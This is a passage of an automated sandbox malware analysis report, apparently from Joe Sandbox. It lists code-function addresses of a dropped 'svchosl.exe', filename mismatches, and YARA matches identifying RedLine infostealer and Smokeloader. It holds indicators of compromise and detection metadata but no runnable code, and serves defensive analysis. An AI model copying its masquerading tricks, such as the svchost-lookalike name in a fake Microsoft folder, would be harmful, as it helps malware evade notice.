Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2C52 16_2_00007FF8A87C2C52
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2A27 16_2_00007FF8A87C2A27
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C48CC 16_2_00007FF8A87C48CC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87DF200 16_2_00007FF8A87DF200
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5227 16_2_00007FF8A87C5227
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2513 16_2_00007FF8A87C2513
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4B74 16_2_00007FF8A87C4B74
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87EB4C0 16_2_00007FF8A87EB4C0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A89574F0 16_2_00007FF8A89574F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5B91 16_2_00007FF8A87C5B91
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88EB600 16_2_00007FF8A88EB600
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3DBE 16_2_00007FF8A87C3DBE
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1B72 16_2_00007FF8A87C1B72
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4651 16_2_00007FF8A87C4651
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1889 16_2_00007FF8A87C1889
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2BC6 16_2_00007FF8A87C2BC6
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2504 16_2_00007FF8A87C2504
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C11DB 16_2_00007FF8A87C11DB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C282E 16_2_00007FF8A87C282E
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87EB850 16_2_00007FF8A87EB850
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3DC8 16_2_00007FF8A87C3DC8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A895C990 16_2_00007FF8A895C990
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4DEA 16_2_00007FF8A87C4DEA
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2932 16_2_00007FF8A87C2932
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6E7E 16_2_00007FF8A87C6E7E
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88F4A40 16_2_00007FF8A88F4A40
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6415 16_2_00007FF8A87C6415
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5CF4 16_2_00007FF8A87C5CF4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C651E 16_2_00007FF8A87C651E
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3206 16_2_00007FF8A87C3206
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C62DA 16_2_00007FF8A87C62DA
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1E79 16_2_00007FF8A87C1E79
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1041 16_2_00007FF8A87C1041
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2987 16_2_00007FF8A87C2987
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C400C 16_2_00007FF8A87C400C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6087 16_2_00007FF8A87C6087
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88F4D50 16_2_00007FF8A88F4D50
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5FEC 16_2_00007FF8A87C5FEC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5880 16_2_00007FF8A87C5880
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4520 16_2_00007FF8A87C4520
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3738 16_2_00007FF8A87C3738
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2BF3 16_2_00007FF8A87C2BF3
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C66C2 16_2_00007FF8A87C66C2
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A8900170 16_2_00007FF8A8900170
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C571D 16_2_00007FF8A87C571D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3968 16_2_00007FF8A87C3968
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C71B2 16_2_00007FF8A87C71B2
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A8870260 16_2_00007FF8A8870260
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C111D 16_2_00007FF8A87C111D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3805 16_2_00007FF8A87C3805
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C7036 16_2_00007FF8A87C7036
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87DC480 16_2_00007FF8A87DC480
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C12EE 16_2_00007FF8A87C12EE
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C7338 16_2_00007FF8A87C7338
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2EAF 16_2_00007FF8A87C2EAF
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87DC620 16_2_00007FF8A87DC620
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2ABD 16_2_00007FF8A87C2ABD
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C17E4 16_2_00007FF8A87C17E4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3134 16_2_00007FF8A87C3134
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5015 16_2_00007FF8A87C5015
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C35DA 16_2_00007FF8A87C35DA
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C227A 16_2_00007FF8A87C227A
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88F9AF0 16_2_00007FF8A88F9AF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6BA4 16_2_00007FF8A87C6BA4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2E0A 16_2_00007FF8A87C2E0A
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C488B 16_2_00007FF8A87C488B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4B9C 16_2_00007FF8A87C4B9C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C51D2 16_2_00007FF8A87C51D2
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6230 16_2_00007FF8A87C6230
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2A90 16_2_00007FF8A87C2A90
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C591B 16_2_00007FF8A87C591B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C37E7 16_2_00007FF8A87C37E7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A8971E40 16_2_00007FF8A8971E40
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2342 16_2_00007FF8A87C2342
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2428 16_2_00007FF8A87C2428
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88F5F00 16_2_00007FF8A88F5F00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C36D4 16_2_00007FF8A87C36D4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1AEB 16_2_00007FF8A87C1AEB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C45BB 16_2_00007FF8A87C45BB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87E5200 16_2_00007FF8A87E5200
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87DD260 16_2_00007FF8A87DD260
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1C21 16_2_00007FF8A87C1C21
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C71C1 16_2_00007FF8A87C71C1
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3094 16_2_00007FF8A87C3094
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88F1320 16_2_00007FF8A88F1320
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3EE0 16_2_00007FF8A87C3EE0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5BBE 16_2_00007FF8A87C5BBE
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C24A5 16_2_00007FF8A87C24A5
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1839 16_2_00007FF8A87C1839
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C11CC 16_2_00007FF8A87C11CC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2761 16_2_00007FF8A87C2761
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3E1D 16_2_00007FF8A87C3E1D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3BF7 16_2_00007FF8A87C3BF7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A8971690 16_2_00007FF8A8971690
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2E32 16_2_00007FF8A87C2E32
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C731A 16_2_00007FF8A87C731A
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4999 16_2_00007FF8A87C4999
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C375B 16_2_00007FF8A87C375B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2F2C 16_2_00007FF8A87C2F2C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1BF9 16_2_00007FF8B7FE1BF9
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEFDB0 16_2_00007FF8B7FEFDB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE210D 16_2_00007FF8B7FE210D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE15C8 16_2_00007FF8B7FE15C8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1E6A 16_2_00007FF8B7FE1E6A
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEB4F0 16_2_00007FF8B7FEB4F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF5540 16_2_00007FF8B7FF5540
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE12E4 16_2_00007FF8B7FE12E4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE24B9 16_2_00007FF8B7FE24B9
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEF695 16_2_00007FF8B7FEF695
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE23DD 16_2_00007FF8B7FE23DD
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF2910 16_2_00007FF8B7FF2910
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B80189D0 16_2_00007FF8B80189D0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE191F 16_2_00007FF8B7FE191F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE12B2 16_2_00007FF8B7FE12B2
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE6D00 16_2_00007FF8B7FE6D00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B804CDB4 16_2_00007FF8B804CDB4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B803EF80 16_2_00007FF8B803EF80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1BB3 16_2_00007FF8B7FE1BB3
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFEFC0 16_2_00007FF8B7FFEFC0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1E6F 16_2_00007FF8B7FE1E6F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1357 16_2_00007FF8B7FE1357
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2478 16_2_00007FF8B7FE2478
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8012620 16_2_00007FF8B8012620
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9087210 16_2_00007FF8B9087210
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9076350 16_2_00007FF8B9076350
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B90643F0 16_2_00007FF8B90643F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B906EBE0 16_2_00007FF8B906EBE0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9076610 16_2_00007FF8B9076610
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9071F11 16_2_00007FF8B9071F11
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C1000 16_2_00007FF8B93C1000
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93CB60C 16_2_00007FF8B93CB60C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C853C 16_2_00007FF8B93C853C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C5CFC 16_2_00007FF8B93C5CFC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C3868 16_2_00007FF8B93C3868
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C8C28 16_2_00007FF8B93C8C28
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C9358 16_2_00007FF8B93C9358
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C9BD4 16_2_00007FF8B93C9BD4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C97DC 16_2_00007FF8B93C97DC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9843FB0 16_2_00007FF8B9843FB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F659B0 16_2_00007FF8B9F659B0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F62FF0 16_2_00007FF8B9F62FF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F64BF0 16_2_00007FF8B9F64BF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F6AA18 16_2_00007FF8B9F6AA18
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F6D258 16_2_00007FF8B9F6D258
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F680B0 16_2_00007FF8B9F680B0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F65ED7 16_2_00007FF8B9F65ED7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA241000 16_2_00007FF8BA241000
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA243BC0 16_2_00007FF8BA243BC0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA4F2DD0 16_2_00007FF8BA4F2DD0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA4F6AE4 16_2_00007FF8BA4F6AE4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA51D130 16_2_00007FF8BA51D130
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA5171CC 16_2_00007FF8BA5171CC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAB21C0 16_2_00007FF8BFAB21C0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD37B0 16_2_00007FF8BFAD37B0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD1A80 16_2_00007FF8BFAD1A80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD3CF0 16_2_00007FF8BFAD3CF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD1A80 16_2_00007FF8BFAD1A80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD2630 16_2_00007FF8BFAD2630
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD2D30 16_2_00007FF8BFAD2D30
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD521C 16_2_00007FF8BFAD521C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD3140 16_2_00007FF8BFAD3140
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\MicrosoftSystem\Wmiic.exe 644C9745D1D2F679DB73FCB717DD37E180E19D5B0FC74575E4CEFE4F543F2768
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 029EE43F appears 44 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C1055 appears 1557 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C4688 appears 138 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C1FC3 appears 55 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C41F6 appears 47 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C40F7 appears 384 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8B7FE1023 appears 568 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C5DDA appears 737 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C1C08 appears 121 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF77B321DF0 appears 110 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF77B321DB0 appears 36 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8B804BE25 appears 103 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C206D appears 82 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8A87C1FFF appears 31 times
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: String function: 00007FF8B804BD8F appears 195 times
Source: C:\Users\123.exe Code function: String function: 00ECEB78 appears 39 times
Source: C:\Users\123.exe Code function: String function: 00ECEC50 appears 56 times
Source: C:\Users\123.exe Code function: String function: 00ECF5F0 appears 31 times
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.3277615325.0000000002A08000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePressie.exe8 vs file.exe
Source: file.exe, 00000000.00000002.3289464221.00000000075EE000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePressie.exe8 vs file.exe
Source: file.exe, 00000000.00000003.2079457079.0000000002B59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs file.exe
Source: file.exe, 00000000.00000002.3285742985.0000000005953000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePressie.exe8 vs file.exe
Source: file.exe, 00000000.00000002.3280551668.000000000485F000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePressie.exe8 vs file.exe
Source: file.exe, 00000000.00000002.3280551668.000000000485F000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs file.exe
Source: file.exe, 00000000.00000002.3275621443.000000000046F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePressie.exe8 vs file.exe
Source: file.exe, 00000000.00000002.3280253389.000000000464C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePressie.exe8 vs file.exe
Source: file.exe, 00000000.00000002.3280253389.000000000464C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs file.exe
Source: file.exe, 00000000.00000003.2079601696.0000000006DBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePressie.exe8 vs file.exe
Source: file.exe, 00000000.00000003.2079601696.0000000006DBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs file.exe
Source: file.exe, 00000000.00000003.2080087221.0000000006DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs file.exe
Source: file.exe, 00000000.00000003.2077593562.0000000004456000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePressie.exe8 vs file.exe
Source: file.exe, 00000000.00000003.2079861670.0000000006DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs file.exe
Source: file.exe, 00000000.00000003.2079316590.0000000002B53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefirefox.exe0 vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamechrome.exe< vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIEXPLORE.EXED vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q,\\StringFileInfo\\080904B0\\OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsedge.exe> vs file.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.file.exe.4420000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.file.exe.29e0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3277615325.00000000029E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000003.2077593562.0000000004420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
